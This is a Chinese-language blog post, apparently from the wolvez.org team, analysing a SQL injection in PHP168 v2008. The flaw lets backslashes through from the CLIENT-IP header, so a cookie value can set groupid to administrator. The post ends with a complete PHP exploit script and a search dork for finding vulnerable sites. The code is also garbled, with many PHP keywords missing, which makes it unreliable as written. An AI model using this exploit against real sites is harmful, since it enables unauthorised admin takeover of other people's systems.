http://www.wolvez.org
简单分析下这个漏洞
common.inc.php
($_SERVER['HTTP_CLIENT_IP']){
$onlineip=$_SERVER['HTTP_CLIENT_IP'];
}($_SERVER['HTTP_X_FORWARDED_FOR']){
$onlineip=$_SERVER['HTTP_X_FORWARDED_FOR'];
}{
$onlineip=$_SERVER['REMOTE_ADDR'];
}
$onlineip = preg_replace("/^([\d\.]+).*/", "\\1", filtrate($onlineip));
//这个地方使用preg_replace存在着安全隐患,的前就暴过漏洞,官方修补思路方法是用filtrate处理了下$onlineip
看下filtrate是如何处理
function.inc.php
function filtrate($msg){
$msg = str_replace('&','&',$msg);
$msg = str_replace(' ',' ',$msg);
$msg = str_replace('"','"',$msg);
$msg = str_replace("'",''',$msg);
$msg = str_replace("<","<",$msg);
$msg = str_replace(">",">",$msg);
$msg = str_replace("\t"," ",$msg);
$msg = str_replace("\r","",$msg);
$msg = str_replace(" "," ",$msg);
$msg;
}
过滤了'"<等,但是没有处理\
common.inc.php
($usr_oltime>30||!$usr_oltime){
$usr_oltime>600 && $usr_oltime=600;
(PHP168_PATH."php168/level.php");
( is($memberlevel[$lfjdb[groupid]]) ){
$SQL=",groupid=8";
$lfjdb[money]=get_money($lfjuid);
foreach( $memberlevel AS $key=>$value){
($lfjdb[money]>=$value){
$SQL=",groupid=$key";
}
}
}{
$SQL="";
}
$db->query("UPDATE {$pre}memberdata SET lastvist='$timestamp',lastip='$onlineip',oltime=oltime+'$usr_oltime'$SQL WHERE uid='$lfjuid'");
//这个地方是拼接串形式,所以可以使用\来转义',然后利用$usr_oltime来注射:)
另外要注意是$usr_oltime有个简单判断,而且还要保证sql语句语法正确,看下我构造语句:
UPDATE {$pre}memberdata SET lastvist='$timestamp',lastip='[\]',oltime=oltime+'[+31,groupid=3,roduce=0x70757265745f74 WHERE uid=2#]'$SQL WHERE uid='$lfjuid'
最后给个EXP:
#!/usr/bin/php
<?php
pr_r('
+---------------------------------------------------------------------------+
Php168 <= v2008 update user access exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PHP168"
+---------------------------------------------------------------------------+
');
/**
* works regardless of php.ini tings
*/
($argc < 5) {
pr_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path user pass
host: target server (ip/hostname)
path: path to php168
user: login username
pass: login password
Example:
php '.$argv[0].' localhost /php168/
+---------------------------------------------------------------------------+
');
exit;
}
error_reporting(7);
ini_('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$pass = $argv[4];
$resp = send;
preg_match('/Set-Cookie:\s(passport=([0-9]{1,4})%09[a-zA-Z0-9%]+)/', $resp, $cookie);
($cookie)
(strpos(send, 'puret_t') ! false)
exit("Expoilt Success!\nYou Are Admin Now!\n");
exit("Exploit Failed!\n");
exit("Exploit Failed!\n");
function rands($length = 8)
{
$hash = '';
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
$max = strlen($chars) - 1;
mt_srand((double)microtime * 1000000);
for ($i = 0; $i < $length; $i)
$hash .= $chars[mt_rand(0, $max)];
$hash;
}
function send
{
global $host, $path, $user, $pass, $cookie;
($cookie) {
$cookie[1] .= ';USR='.rands."\t%2b31,groupid=3,roduce=0x70757265745f74 WHERE uid=$cookie[2]#\t\t";
$cmd = '';
$message = "POST ".$path."member/userinfo.php HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$message .= "CLIENT-IP: ryat\\\r\n";
$message .= "Host: $host\r\n";
$message .= "Content-Length: ".strlen($cmd)."\r\n";
$message .= "Connection: Close\r\n";
$message .= "Cookie: ".$cookie[1]."\r\n\r\n";
$message .= $cmd;
} {
$cmd = "username=$user&password=$pass&step=2";
$message = "POST ".$path."login.php HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$message .= "Host: $host\r\n";
$message .= "Content-Length: ".strlen($cmd)."\r\n";
$message .= "Connection: Close\r\n\r\n";
$message .= $cmd;
}
$fp = fsockopen($host, 80);
fputs($fp, $message);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
$resp;
}
?>
最新评论